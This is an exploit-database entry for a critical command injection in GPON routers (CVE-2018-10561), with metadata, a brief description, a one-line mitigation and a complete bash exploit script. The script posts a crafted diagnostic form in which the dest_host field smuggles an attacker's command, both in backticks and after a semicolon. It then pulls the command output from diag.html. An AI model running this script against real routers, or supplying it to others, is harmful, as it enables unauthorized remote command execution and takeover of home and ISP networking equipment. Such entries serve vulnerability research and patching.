Vendor: GPON Router
By: Anonymous
CVSS: 9.8 (CRITICAL)
Command Injection
CWE: 78
Product Name: GPON Router
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2018-10561
CPE: o:fiberhome:gpon_router
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Unknown
2020

Sending and Retrieving Commands on GPON Routers

This exploit lets an attacker send commands to GPON routers and retrieve their output. It sends each command in two forms, wrapped in backticks (`) and appended after a semicolon (;), because different models trigger on one form or the other. It then waits 3 seconds and retrieves the output from the diag.html page.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any system command.

Exploit-DB raw data:

#!/bin/bash

echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting…."
sleep 3
echo "[+] Retrieving the output…."
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'